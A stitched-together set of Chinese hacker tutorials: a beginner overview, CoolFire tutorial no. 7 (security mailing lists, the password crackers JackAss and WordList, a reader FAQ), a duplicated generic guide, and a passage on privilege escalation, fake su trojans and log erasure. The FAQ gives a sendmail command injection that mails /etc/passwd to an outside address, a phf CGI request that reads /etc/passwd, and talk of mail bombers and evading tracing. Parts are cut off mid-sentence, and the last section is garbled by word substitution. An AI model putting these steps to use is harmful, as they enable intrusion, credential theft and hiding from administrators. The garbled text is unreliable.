coolfire黑客入门教程系列
黑客入门(超级详细版)
论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是
一样的。即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点和
目的不一样而已。很多人曾经问我:“做黑客平时都做什么?是不是非常刺激?”也有人对
。
这种协议很类似于“摩尔斯电码”,简单的一点一横,经过排列可以有万般变化,但是假如
没有“对照表”,谁也无法理解一分杂乱无章的电码所表述的内容是什么。电脑也是一样,
它们通过各种预先规定的协议完成不同的使命,例如RFC1459协议可以实现IRC服务器与客户
端电脑的通信。因此无论是黑客还是网络管理员,都必须通过学习协议达到了解网络运作机
每一台上网的电脑都具有独一无二的IP地址,这个地址类似于生活中人们的家庭地址,通过
网络路由器等多种物理设备(无需初级学习者理解),网络可以完成从一个电脑到另一个电
脑之间的信息交换工作,因为他们的IP地址不同,所以不会出现找不到目标的混乱局面。但
是黑客可以通过特殊的方法伪造自己电脑的IP地址,这样当服务器接受到黑客电脑(伪IP地
好像北京城有八个城门一样,不同的协议体现在不同的网络服务上,而不同的网络服务则会
在客户端电脑上开辟不同的端口(城门)来完成它的信息传送工作。当然,如果一台网络服
务器同时开放了多种网络服务,那么它也要开放多个不同的端口(城门)来接纳不同的客户
端请求。
网络上经常听到的“后门”就是这个意思,黑客通过特殊机能在服务器上开辟了一个网络服
务器,通过远程ftp登陆可以获得系统上的各种文件资源等。
黑客技术入门教程
黑客技术入门教程黑客技术入门教程黑客技术入门教程第一节、黑客的种类和行为以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情,因为邪派黑客所从事的事情违背了《黑客守则》,所以他们真正的名字叫“骇客”(Cracker)而非“黑客”(Hacker),也就是我们平时经常听说的“黑客”(Cacker)和“红客”(Hacker)。
无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是一样的。
即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点和目的不一样而已。
很多人曾经问我:“做黑客平时都做什么?是不是非常刺激?”也有人对黑客的理解是“天天做无聊且重复的事情”。
实际上这些又是一个错误的认识,黑客平时需要用大量的时间学习,我不知道这个过程有没有终点,只知道“多多益善”。
由于学习黑客完全出于个人爱好,所以无所谓“无聊”;重复是不可避免的,因为“熟能生巧”,只有经过不断的联系、实践,才可能自己体会出一些只可意会、不可言传的心得。
在学习之余,黑客应该将自己所掌握的知识应用到实际当中,无论是哪种黑客做出来的事情,根本目的无非是在实际中掌握自己所学习的内容。
第二节、黑客应掌握的基本技能从这一节开始,我们就真正踏上学习黑客的道路了,首先要介绍的是作为一名初级黑客所必须掌握的基本技能,学习这可以通过这一节的阅读了解到黑客并不神秘,而且学习起来很容易上手。
为了保证初学者对黑客的兴趣,所以本书采取了循环式进度,也就是说每一章节的内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内容。
一、了解一定量的英文:学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在这段时间内网络管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。
coolfire 黑客入门8篇(7)
coolfire黑客入门教程系列之(七)这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!写这些文章真的花了蛮多时间的, 我也没办法确定甚么时候可以写好下一篇, 所以没有办法预告, 因为预告不准的话会挨骂的. 以後写CoohHC 的时间会少很多的, 因为工作越来越多的关系, 希望大家见谅, 如果一两个月才出现一篇的话也不要骂我喔~ 如果你曾经用印表机把这些文章一篇篇的印出来的话, 你就应该知道写这些东西有多辛苦了, 上次在朋友那边看到, 差点吐血!首页上的网友交流版是一个不错的交流方式, 在CoolHC 没有写的这段时间大家可以在上面聊一聊自己的破解心得, 这样我也可以少写一些FAQ, 当然在上面有经验的网友们也可以分享一下你们的经验, 让一些新手快点进入状况, 不会再问一些怪问题~中国网管联盟www_bitscn_com**** Mail List 订阅****事实上, CoolHC 写到这里已经没有甚么可以多讲的了, 因为有很多东西并不是用技巧来破解, 我们所使用的都是系统的漏洞. 而这些漏洞, 有些由於已经出现了很久, 所以有些网站也已经更新了这些问题, 你就没有办法得到你所预期的结果了. 除非你能够在他们Patch 之前先进入, 所以就必需要取得最新的Bugs 资讯.在网路上有很多系统安全讨论的Mail List, 这些Mail List 讨论的内容大多与各系统的安全性有关, 所以在讨论内容上也都会围绕著新的Bugs 打转, 如果能够善加的利用这些资讯, 相信你可以在得到新的Bug 资料时就轻易的拿下很多网站的密码档案.所以在这一期的内容上, 我们就以如何订阅这些Mail List 为主题, 让大家能够吸收到这些新的资讯, 这样也不会等到CoolHC 写好的时候, 大多数的Bugs 都已经补上了.[1] 8lgm (Eight Little Green Men)加入方式: 写一封E-Mail 到majordomo@ 标题不用填写, 在信件内容的地方填上: subscribe 8lgm-list[2] Academic Firewalls加入方式: 写一封E-Mail 到majordomo@ 标题不用填写, 在信件内容的地方填上: SUBSCRIBE Academic-Firewalls[3] Alert加入方式: 写一封E-Mail 到request-alert@ 标题不用填写, 在信件内容的地方填上: subscribe alert取消订阅: 写一封E-Mail 到request-alert@ 标题不用填写, 在信件内容的地方填上: unsubscribe alert讨论主题: Security Product AnnouncementsUpdates to Security ProductsNew Vulnerabilities foundNew Security Frequently Asked Question files.New Intruder Techniques and Awareness[4] Best of Security加入方式: 写一封E-Mail 到best-of-security-request@ 标题不用填写, 在信件内容的地方填上: subscribe best-of-security[5] Bugtraq (CoolFire 推)加入方式: 写一封E-Mail 到LISTSERV@NETSPACE.OR 标题不用填写, 在信件内容的容的地方填上: SUBSCRIBE BUGTRAQ网管网bitsCN_com讨论主题: Information on Unix related security holes/backdoors (past and present)Exploit programs, scripts or detailed processes about the abovePatches, workarounds, fixesAnnouncements, advisories or warningsIdeas, future plans or current works dealing with Unix securityInformation material regarding vendor contacts and proceduresIndividual experiences in dealing with above vendors or security organizationsIncident advisories or informational reporting[6] COAST Security Archive加入方式: 写一封E-Mail 到coast-request@ 标题不用填写, 在信件内容的地方填上: SUBSCRIBE coast[7] Computer Privacy Digest (CoolFire 推)加入方式: 写一封E-Mail 到comp-privacy-request@ 标题不用填写, 在信件内容的地方填上: subscribe cpd/org/comp-privacy/ (一些旧文章的收集, 蛮有用处的)Gopher: . [8] Computer Underground Digest加入方式: 写一封E-Mail 到CU-DIGEST-REQUEST@ 标题不用填写, 在信件内容的地方填上: SUB CUDIGEST新闻论坛: comp.society.cu-digest (USENET)[9] Cypherpunks加入方式: 写一封E-Mail 到majordomo@ 标题不用填写, 在信件内容的地方填上: SUBSCRIBE cypherpunks[10] Cypherpunks Announce加入方式: 写一封E-Mail 到majordomo@ 标题不用填写, 在信件内容的地方填上: SUBSCRIBE cypherpunks-announce[11] Euro Firewalls加入方式: 写一封E-Mail 到majordomo@ 标题不用填写, 在信件内容的地方填上: SUBSCRIBE firewalls-uk email-addr[12] Firewalls加入方式: 写一封E-Mail 到majordomo@ 标题不用填写, 在信件内容的地方填上: SUBSCRIBE firewalls[13] Intrusion Detection Systems加入方式: 写一封E-Mail 到majordomo@.au 标题不用填写, 在信件内容中国网管论坛的地方填上: subscribe ids讨论主题: techniques used to detect intruders in computer systems and computer networks audit collection/filteringsubject profilingknowledge based expert systemsfuzzy logic systemsneural networksmethods used by intruders (known intrusion scenarios)cert advisoriesscripts and tools used by hackerscomputer system policiesuniversal intrusion detection system[14] NT Security加入方式: 写一封E-Mail 到request-ntsecurity@ 标题不用填写, 在信件内容的地方填上: subscribe ntsecurity取消订阅: 写一封E-Mail 到request-ntsecurity@ 标题不用填写, 在信件内容的地方填上: unsubscribe ntsecurity[15] WWW Security加入方式: 写一封E-Mail 到www-security-request@ 标题不用填写, 在信件内容的地方填上: SUBSCRIBE www-security email_address(上面的email_address 填你自己的E-Mail) 中国网管联盟www_bitscn_com[16] Linux Security加入方式: 写一封E-Mail 到majordomo@ 标题不用填写, 在信件内容的地方填上: SUBSCRIBE linux-security your-name(上面的your-name 填你自己的名字, 最好填英文的, 怕他们看不懂)[17] Linux Security Alert加入方式: 写一封E-Mail 到majordomo@ 标题不用填写, 在信件内容的地方填上: SUBSCRIBE linux-alert your-name(上面的your-name 填你自己的名字, 最好填英文的, 怕他们看不懂)[18] Sun Security Alert加入方式: 写一封E-Mail 到security-alert@ 标题不用填写, 在信件内容的地方填上: SUBSCRIBE CWS email-addr(上面的email-addr 填你自己E-Mail)上面我林林总总列出了18 个MailList, 请针对你喜欢的来订阅, 当然也可以全部订阅, 日後觉得不需要哪一些的时候再取消掉, 在MailList 上发信请注意MailList 的使用礼节及一些发信上应该注意的问题, 这些在订阅後自然会有说明寄给你. MailList上有些会有存放FAQ 的地方, 也请各位先看一看这些FAQ 再发问. 嗯, 以後大家就要中国网管联盟靠自己罗, 若有新发现也别忘了来封信告诉我!!!!**** Crack 工具****[JackAss V1.1]许多网友最喜欢的就是这一篇了, 所以这一篇好像是少不了的, 但是软体更新的速度事实上可能没有我们的文章快. 上次介绍的John the Ripper 1.3 大家用了觉得如何???有没有甚么大问题呢? 应该还不错吧! 这次要介绍的是JackAss V1.1 是我刚在国外网页上抓回来的, 也不知道出现了多久, 看一下档案日期是4-09-96, 好像已经出来很久了, 都没有注意到它的存在.一般我们以CJack 来破解密码档案的时候, CJack 是以呼叫字典档, 然後逐字加密再进行比对的方式来作解码的动作, 所以并不是所有的密码都找得到, 所以就有人想出以暴力的方式来解码, 前题是机器够快, 然後时间够多, 才能避免浪费掉很多系统的时间. CJack 在设计的理念上就是这样, 所以基本上还是略显不足, 所以才会有很多的辅助工具出现, 像先前几篇我们所介绍的KOS 就是一个例子.JackAss 基本上是一个辅助Jack 的工具, 跟KOS 一样, 需要有CJack 才能够执行, 网管网bitsCN_com他的英文注解是: Add On For CrackJack, 与KOS 不同之处是: KOS 对CJack 的不足处作了补强, 让CJack 可以跑出一些大小写数字混合的密码, 而JackAss 则是一个完全不同的方式, 他不需要使用任何的字典档, 因为它本身就是一个字典档产生器. 当你使用JackAss 来作为CJack 的前导, 执行JackAss 之後他会依照你的选项来制造出字典档, 然後再呼叫CJack 来跑这些字.试了一下JackAss 似乎功能上不怎么样, 有点类似国内上次出现的那支密码破解程式, 不过速度上倒是比较快, 如果你是要用暴力法来破解, 又有几台不错的机器, 你可以试著在不同的机器上跑, 这样速度会快一点, 如果单用一台机器要跑暴力法, 可能就很累了. 当然, 如果你可以只跑单一User 的话, 速度会快一点, 所以我建议拿JackAss 来跑root 的部份, 其它的用GlobalKOS 来跑字典法就行了~~ 不要那么累!之前在p.security 看到有几位网友在讨论解码的文章, 其中有一位网友的观点跟我的有点相像, 他的说法是: 将所有的字典档先编码, 存成一个大型的资料库, 当你抓回密码档的时候, 直接用密码档来作逐行的比对, 这样速度上会快一点, 因为省去了网管联盟编码的时间. 如果有人要作这样的程式的话, 我想应该要有一个不小的硬碟, 用来储存这个完成後颇大的资料库, 然後查询方面最好是用SQL 来作查询, 速度上应该会快一点因为在其它的查询方法上, 如果资料库非常庞大, 可以系统跑起来会像当机一般吧?? 再者机器的速度应该也要够快, 最好呢, 能够写出一个CGI 来Call 这支程式, 让大家可以在网页上丢出passwd 档来查询, 再将查询完的结果寄回电子邮件信箱中. 这看起来好像有点神话, 其实这很容易作到的, 只是没有人真的这样作, 是吗?? 目前还没预估过这样作所须要的主机配备, 大家有空的时候帮忙想一想吧??[WordList V1.0]这个程式是一支字典档产生器, 他能产生五个字的字典档, 就是排列组合啦~ 也没有用甚么特殊的方法, 使用他来产生字典可以产生一个相当大的字典, 不过速度上相当的慢就是了, 这种程式所产生的字典有点暴力, 因为他跟本不依照字典的方式来产生, 但是所产生的字也就相当的可观, 不过只要密马是五个字的, 都一定逃不过~ 属於暴力法的一种. 速度慢? 慢到甚么程度呢? 你亲自的试一下就知道了, 我跑到一半就把它停掉了,中国网管联盟www、bitsCN、com不晓得是用甚么语言写的, 还For Win 3.x/95, 纯DOS 下无法执行. 除了速度慢的缺点之外, 这支程式所跑出来的字典档是五个字的, 我觉得真对五个字的密码来作解码是有点暴力, 不过大家应该把自己的密码弄长一点, 因为之前我破解的一组密码, 居然有人用一个英文字元来当密码, 系统管理人员应该将密码设定最少四个字元, 这样密码才不容易被人盗用, 不然就将系统安全作得好一点, 不要让人轻易的拿到passwd 档.>> 这些档案你都可以在我们的首页中抓到!**** 新旧短闻****UpYours 4 好像还没有正式版本的消息, 不过最近Beta3 已经推出了, 但是在OTRiCS所得到的消息, GlobalKos 决定放弃UpYours 这个专案, 也就是说以後可能没有这套软体可以用了. 也没有错啦, 最近的Mail Server 跟Server 间的传输是要经过认证的,Mail Bomb 也对许多人造成了困扰, 甚至干扰到网路正常的运作, 认证之後可能会发生你的匿名Mail 无法真的匿名的问题, 劝大家还是少用吧! 有机会我会将可能是最後一个版本的UpYours Beta 3 放在首页上让大家留念, 上面这个消息还没有得到GlobalKOS 这个Group 的证实就是了.详细的状况大家可以到: /hackr1.html 翻翻看! 记得看仔细一点喔, 因为有很多的资讯, 这边都有连结点啦~~GlobalKOS 的站台在几个月前不明原因"消失" 了, 有人可能还没有见过就连不上了, 我找到了一个以前的Mirror 点, 在上面也可以下载KOS 及UpYours, 有兴趣的网友可以连到: /ehack/files/misc/koskrack.html 瞧瞧~使用Windows 95 及Windows NT 的网友, 应该已经被Out-Of-Band 烦死了吧? 这个系统的漏洞真的是害了许多人, 微软也还没有为这个事件发表甚么意见, 不过for 95 的Patch 已经出来了, Windows NT 的使用者也可以赶紧下载Service Pack 3 来补一补!!不然很可能下一秒钟被ReBoot 的就是你的系统.**** 首页统计****我们的首页感谢大家的支持, 现在人数20427 人次? 经过Web Count 的追踪, 每天的平均上站人次是: 274 人次, 至於上站的[时间/人数]对照如下表:+---+---+---+---+---+---+---+---+---+---+---+---+---+ | 时| 00| 01| 02| 03| 04| 05| 06| 07| 08| 09| 10| 11|+---+---+---+---+---+---+---+---+---+---+---+---+---+| 人| 13| 13| 11| 8| 5| 5| 5| 5| 8| 9| 10| 11|+---+---+---+---+---+---+---+---+---+---+---+---+---+| 时| 12| 13| 14| 15| 16| 17| 18| 19| 20| 21| 22| 23|+---+---+---+---+---+---+---+---+---+---+---+---+---+| 人| 12| 12| 10| 11| 11| 12| 11| 11| 12| 12| 13| 13|+---+---+---+---+---+---+---+---+---+---+---+---+---+塞车时段: 22~01 疏通时段:04~07+-----+-----+-----+-----+-----+-----+-----+| SUN | MON | TUE | WED | THU | FRI | SAT |+-----+-----+-----+-----+-----+-----+-----+| 271 | 249 | 236 | 254 | 223 | 247 | 254 |+-----+-----+-----+-----+-----+-----+-----+感觉上都差不多, 星期天是多了一点作这个统计, 可以让大家在上站的时候, 挑选比较好上站的时间, 这样才不会浪费你宝贵的时间在等待资料的传输, 这些资讯你也可以在首页上点选Web Story 按钮看到, 每个小时会更新一次, 请多多利用!-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-***** CoolFAQ ****[Q0]我自己有一个Home Page, 我要如何在我的Home Page上连结你的首页呢???[A0]我们的首页连结图片放在:/~fetag/fetag.gif首页连结, 请连结到:/~fetag/Hack.htm所以你只要在你的HTML 档中加上底下这一行就可以了:<a href=/~fetag/Hack.htm><img src=/~fetag/fetag.gif alt="飞鹰工作室"></a>[Q1]我一进去的目录是"/",我用ls指令後都没有看到资料夹,有没有可能是把/etc/passwd隐藏了呢?我进去时先出来的画面: 220 flag12 Microsoft FTP service (Verision2.0)我又用了anonymous.ftp.这两个username进去,也成功了而且目录也都一样,那有没有可能passwd不放在这里?[A1] 因为一般我们在找password 档的时候, 我们测试(实作)的Server 都是使用Unix 的Server来作, 所以我会写是/etc/passwd, 照你这个情况看来, 你进入的FTP Server 应该是WindowNT 的系统(我也没有把握能够确定这件事), 如果是这样的状况的话, 一般的WinNT系统是不会有/etc 这个目录的, 自然也就无法用ls 指令看到了![Q2]我觉得知道某人的IP又能怎样呢? 现在ISP都是使用不固定的IP呀? 若你说有纪录呀?可是像我使用非自己的或是免费的呢?像我的网页就有告诉人家免费上网(中研院提供的)查到IP也没用呀?为何还需要用E-mail bomb 的隐密IP呢?我实在想不通, 可以告诉我吗?[A2]对呀!! 但是如果该主机可以查出该IP 的确实上线时间(有Log 档可查)另外也可以再经由电信系统查甚么时候拨到哪支电话的电话号码, 循线就可以逮到你了~ 但是现在电信局不太管这样的事, 不过如果你犯了很大的错, 有检察官要求他们查, 你说查不查得到????? IP 固不固定又很重要吗??? 还是能Fake IP 是最好的~~ 把Ping关掉?? 呵呵~~ 想通吧![Q3]中国网管联盟1.I can't download KeyPro Emu'. I think the location is wrong. Can you send itto me?2.嗨...,UpYours3还是传不下来...能否告诉我其他地方哪里有? or用别的方法寄来?(真的!没骗你,我每次下载到1.xMB时,就会卡住,都不动了...)3.I can not download kos.zip by FTP. Can you use UUDECODE to past the kos.zipto me ?[A3]有很多网友在传档案的时候都会发生这种状况, 由於我的ISP 日前将DNS Server 及Http Server 作了一些调整, 有些档案好像没有搬好的样子, 目录底下遗失了一些档案, 自然各位也就没有办法抓到了, 不过有很多档案可以在File Mirror Site 抓到, 目前我们有热心的网友提供了/pub/security 这个位址供本站Mirror 一些档案, 我也将一些较大, 大家比较不容易抓下来的档案都放了一份在上面, 所以不管是甚么档案, 如果有抓不下来, 或是系统告诉你有连结错误的, 你都可以到这个FTP抓取, 不过该主机对Anonymous 设限, 一次最多只能有5 的使用者同时上线抓档, 如果有连不上的, 就请你找个比较不塞车的时间再上去抓抓看! 我们没有办法提供E-Mail 送档的服务, 虽然之前有帮几位网友送档, 但是现在有了ftp 让各位自己抓取, 我们也就不浪费网路的频宽及时间了.[Q4]我已经申请了cyberspace的帐号,请问要从那一个画面连上cyberspace,然後再去crack? 如果我用ftp or telnet进入了系统,那我的IP位址和我所做的任何动作会不会在那里留下任何线索?[A4]我想你们都误会了我的意思, 不是说你Login 进入Cyberspace 再Login 到别的站台, 别人就只会查到你在Cyberspace 的帐号, 事实上当你Login 进Cyberspace 时, 也已经暴露了你目前的IP, 因为你Login 的时候Cyberspace 也会询问你的IP.[Q5]1.你的站为什么关了?2.I can't download Cracker Jack,KOS and other files,why?This is the error message when I download "Cracker Jack 1.4":Error 404Not found - file doesn't exist or is read protected even tried multiCERN httpd 3.03.When i join your Homepag, i receive the error:HTTP/1.0 404 Object Not Found . 中国网管论坛What has happend?[A5]那一阵子由於我的ISP 这边传输的状况并不是很好, 所以有很多人可能连上来的时候找不到东西了, 这个问题也一直困扰我很久, 但是也是没有办法真正的彻底解决, 所以如果有这种状况的话, 请大家写信通知我一下, 如果是迁移到其它的Web 站去, 或是暂时停止服务的话, 我们也会在上面作一些说明, 不会有让大家找不到的情况发生的![Q6]Sorry to bother you again,because I thought the "John the Ripper". can help mefind out the register code which I want;however,can you hepl me to find outthe register code for the software "Xing MPEG Player 32-Bit 3012 Trial",whichI down loaded from ......[A6]居然有人会来找我问软体注册码的问题, 我可没有办法回答, 这不是我的专业, 当然破解站台也不是我的专业, 所以如果有此类的问题的话, 请各位到alt.hacker 论坛去发问,或是在国内找找其它提供注册码的站台, 我没有办法帮你耶....:([Q7]你知道吗?news上俞煌男有写一个程式是sendmail 收到password to you know?你是否也中国网管联盟有同样的program?and letmein 2.0不知进展如何?[A7]呵呵~~ Know How 是不是?? 其实要看他写出来的东西是针对哪个Sendmail 版本啦, 像很多版本的Sendmail 都有被人家抓出一些Bug 出来, 那也要看这个Bug 的危险性到甚么程度,一般这些东西都会有人整理出来, 但是如果Mail Server 使用的刚好不是Bug 有列出来的话, 你可能也没有办法了吧?? 我举一个很久以前在Bugtraq 上面看到的sendmail bug 来作说明好了, 这个Bug 的版本我忘了, 好像是sendmail 5.6 的吧(很久了), 现在不晓得还有没有人在用这个版本, 如果有的话, 就算他倒霉好了! 是这样的, 这个版本的Sendmail 可以让人执行一些指令, 所以我们可以利用这个漏洞把passwd 档寄给自己, 而连到smtp 就可以控制sendmail 来发信了!telnet xxx.xxx.xxx 25helo MyDearmail from: "|/bin/mail me@myhost </etc/passwd"rcpt to: me@myhostdatathis is a test mail.像这样就可以让这台主机把他自己的/etc/passwd 寄给我了, 但是也要看他有没有提供网管联盟mail这支程式, 有没有放在/bin 目录, 像这目录也是很重要的, 有的例子我举出来像cgi hole 我是举例他放在/cgi-bin 目录, 但有些人的目录名称是/cgi 或/bin 或/exe 就没有人会变通, 一直写信来问我, 为甚么照这个指令没有办法抓到... 等等, 很难讲啦, 谁晓得他们目录命名的方式,都是随人家高兴的嘛~~不过像你所讲的, 把这种Bug 写成程式来抓passwd 档, 那是不是要针对很多版本的sendmail 都要有判断? 再针对每个版本送出不同的指令? 如果真的可以写出来这样的程式的话, 那一定是很不错, 不过这应该还只是一个理想吧?? 俞兄如果有写好的, 请寄送一份给小弟, 我倒想看看程式可以强到甚么程度. 还有, 并不是每个sendmail Bug 都是连上smtp 就可以作了, 有些还要写一些小程式(Scripts) 才跑才有用, 也就是说你必需要有一个login 到该server 的帐号才行.... 所以..... 难说啦![Q8]I already download avalanche v2.8 mail bomber,but I can't send it! When Istart send the bomb massage,why always receive 553 error ot other error? 网管网bitsCN_com can you help me how to seng it![A8]有些MailBomb 我并没有实际的测试过, 因为种类实在太多了, 现在好像越来越多人喜欢写这种程式, 如果你有类似的问题, 可以到我们首页上的留言版发问, 相信有用过的网友会提供你一些设定上的建议, 让你的程式能够正常的运作.[Q9]Hi, I read your hack homepage, it's very good. Do you know any BBS or sitesabout system security & hacking? They are always underground, I can't findthem.Thanks alot.[A9]目前中文的Hack Homepage 大多都是关於软体注册码的网站, 有些网站现在也会提供一些关於破解主机方面的资讯, 我们将在首页上建立一些网页的连结点, 让网友们可以到其它的网站上看看其它的破解资讯, 如果你有建立一个相关的网页的话, 请写信给我,我会将你的网页加入我们站上的连结. 至於bbs 的话, 各大专院校的bbs 应该都有Hacker 区的讨论, 目前国内以交大资工的Hacker 区资料最为丰富, 你有空也可以上去看看. .tw[Q10] 中国网管联盟www_bitscn_com很冒昧的打扰你,小弟拜读你的大作中coolhk2 时,便实地的操练了一下,当小弟在浏览器中下达∶http://xxxxxx/cgi-bin/nph-test-cgi?*後,诚如你所说的一份报表出来如下∶CGI/1.0 test script report:argc is 1. argv is \*.SERVER_SOFTWARE = Apache/1.0.0SERVER_NAME = .twGA TEWAY_INTERFACE = CGI/1.1SERVER_PROTOCOL = HTTP/1.0SERVER_PORT = 80REQUEST_METHOD = GETHTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,*/*PATH_INFO =PATH_TRANSLATED =SCRIPT_NAME = /cgi-bin/nph-test-cgiQUERY_STRING = 2 Count.cgi acc acc.c archie calendar count date discuss doit.cgi dopost.c finger fortune guestmsg guestmsg.c imagemap jj move.pl nph-count nph-test-cgi phf post-query post.c query ranking re.c repost.c repost.c.bak test-cgi test-cgi.tcl uptime vote.pl wais.pl REMOTE_HOST = 140.130.1.218REMOTE_ADDR = 140.130.1.218网管网REMOTE_USER =CONTENT_TYPE =CONTENT_LENGTH =但是当小弟再接著输入∶http://xxxxxxxx/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd可是却没有passwd 出现,仅出现如下∶Ⅰ.Server ErrorThe server encountered an internal error or misconfiguration andwas unable to complete your request.Please contact the server administrator, allen@.tw andinform them of the time the error occurred, and anything you might havedone that may have caused the error.Ⅱ.Query Results/usr/local/bin/ph -m alias=x less /etc/passwd上面的Ⅰ及Ⅱ是小弟分别在不同的站所试出的结果,请问一下为什么会如此呢,是不是小弟指令下错了或者是该站的软体已经把bug 给patch 过了,谢谢你![A10]正如你所说, 可能这个站台已经把他们的httpd Patch 过了, 所以没有办法拿到, 也不一定要用less 指令, 也可以用more, cat 等指令来试看看, 你上面所下的指令应该都正确才对,如果真是已经Patch 过了的话, 就只好试试看系统有没有其它的漏洞罗.这个漏洞主要是系统所提供的phf 的bug, 有些主机在test-cgi 的Report 上的Query String 那一行没有phf, 也就表示这台主机没有提供phf 这个cgi 让你使用, 也就没有办法用这个方式来取得passwd 档了.[Q11]1. Can you tell me how to find the KOS file by YAHOO.The best of idle is tellme the FTP site.Thank you. :)2.我给您发完信后,想从您的首页上拉个CJACK14下来,发现上面好象没有耶我点取了那个名字,可是报告说没有这个文件。
从零开始学习黑客技术入门教程(基础)-20211123073952
从零开始学习黑客技术入门教程(基础)学习黑客技术是一项既有趣又富有挑战性的任务。
它不仅可以帮助你了解网络安全,还可以提高你的计算机技能。
在这个教程中,我们将从基础开始,一步一步地教你如何成为一名黑客。
我们需要了解什么是黑客。
黑客并不是那些在电影中看到的破坏计算机系统的人。
实际上,黑客是指那些使用计算机和网络技术来探索、理解、创新和解决问题的人。
他们可以是网络安全专家、程序员、工程师等等。
1. 编程语言:编程语言是计算机程序的基础。
学习编程语言可以帮助你理解计算机的工作原理,以及如何编写代码来解决问题。
Python是一种非常适合初学者的编程语言,它简单易学,功能强大。
2. 操作系统:操作系统是计算机的核心软件,它管理计算机的硬件和软件资源。
学习操作系统可以帮助你了解计算机是如何工作的,以及如何使用计算机来完成任务。
Linux是一种非常流行的操作系统,它开源、免费,非常适合学习黑客技术。
3. 网络协议:网络协议是计算机之间进行通信的规则。
学习网络协议可以帮助你了解互联网是如何工作的,以及如何保护自己的网络安全。
TCP/IP是互联网中最常用的网络协议。
除了基础知识,你还需要学习一些黑客技术的基本工具和技巧。
这包括如何使用网络扫描工具、如何进行渗透测试、如何编写漏洞利用代码等等。
学习黑客技术需要时间和耐心,但是只要你坚持下去,你一定可以成为一名优秀的黑客。
希望这个教程可以帮助你开始你的学习之旅。
从零开始学习黑客技术入门教程(基础)学习黑客技术是一项既有趣又富有挑战性的任务。
它不仅可以帮助你了解网络安全,还可以提高你的计算机技能。
在这个教程中,我们将从基础开始,一步一步地教你如何成为一名黑客。
我们需要了解什么是黑客。
黑客并不是那些在电影中看到的破坏计算机系统的人。
实际上,黑客是指那些使用计算机和网络技术来探索、理解、创新和解决问题的人。
他们可以是网络安全专家、程序员、工程师等等。
1. 编程语言:编程语言是计算机程序的基础。
黑客技术初级教程
当然大多半进击成功的典范照样应用了体系软件本身的破绽.造成软件破绽的重要原因在于编制该软件的程序员缺乏安然意识.当进击者对软件进行非正常的挪用要求时造成缓冲区溢出或者对文件的不法拜访.个中应用缓冲区溢出进行的进击最为广泛,据统计80%以上成功的进击都是应用了缓冲区溢出破绽来获得不法权限的.关于缓冲区溢出在后面用专门章节来作具体说明.无论作为一个黑客照样一个收集治理员,都须要控制尽量多的体系破绽.黑客须要用它来完成进击,而治理员须要依据不合的破绽来进行不合的防御措施.懂得最新最多的破绽信息,可以到诸如Rootshell(www.rootshell.com).Packetstorm (packetstorm.securify.com).Securityfocus (www.securityfocus.com)等网站去查找.2.权限的扩大体系破绽分为长途破绽和当地破绽两种,长途破绽是指黑客可以在此外机械上直接应用该破绽进行进击并获取必定的权限.这种破绽的威逼性相当大,黑客的进击一般都是从长途漏敞开端的.但是应用长途破绽获取的不必定是最高权限,而往往只是一个通俗用户的权限,如许经常没有办法做黑客们想要做的事.这时就须要合营当地破绽来把获得的权限进行扩大,经常是扩大至体系的治理员权限.只有获得了最高的治理员权限之后,才可以做诸如收集监听.打扫陈迹之类的工作.要完成权限的扩大,不单可以应用已获得的权限在体系上履行应用当地破绽的程序,还可以放一些木马之类的诱骗程序来套取治理员暗码,这种木马是放在当地套取最高权限用的,而不克不及进行长途控制.例如一个黑客已经在一台机械上获得了一个通俗用户的账号和登录权限,那么他就可以在这台机械上放置一个假的su程序.一旦黑客放置了假su程序,当真正的正当用户登录时,运行了su,并输入了暗码,这时root暗码就会被记载下来,下次黑客再登录时就可以应用su变成root了.进击的善后工作1.日记体系简介假如进击者完成进击后就连忙分开体系而不做任何善后工作,那么他的行踪将很快被体系治理员发明,因为所有的收集操纵系同一般都供给日记记载功效,会把体系上产生的动作记载下来.所以,为了自身的隐蔽性,黑客一般都邑抹失落本身在日记中留下的陈迹.想要懂得黑客抹失落陈迹的办法,起首要懂得罕有的操纵体系的日记构造以及工作方法.Unix的日记文件平日放鄙人面这几个地位,依据操纵体系的不合略有变更/usr/adm——早期版本的Unix./Var/adm新一点的版本应用这个地位./Varflort一些版本的Solaris. Linux BSD. Free BSD应用这个地位./etc,大多半Unix版本把Utmp放在此处,一些Unix版本也把Wtmp放在这里,这也是Syslog.conf的地位.下面的文件可能会依据你地点的目次不合而不合:acct或pacct-一记载每个用户应用的敕令记载.accesslog重要用来办事器运行了NCSA HTTP办事器,这个记载文件会记载有什么站点衔接过你的办事器.aculo保管拨出去的Modems记载.lastlog记载了比来的Login记载和每个用户的最初目标地,有时是最后不成功Login的记载.loginlog一记载一些不正常的L0gin记载.messages——记载输出到体系控制台的记载,别的的信息由Syslog来生成security记载一些应用 UUCP体系妄图进入限制规模的事例.sulog记载应用su敕令的记载.utmp记载当前登录到体系中的所有效户,这个文件陪同着用户进入和分开体系而不竭变更.Utmpx,utmp的扩大.wtmp记载用户登录和退出事宜.Syslog最重要的日记文件,应用syslogd守护程序来获得.2.隐蔽踪影进击者在获得体系最高治理员权限之后就可以随便修正体系上的文件了(只对通例 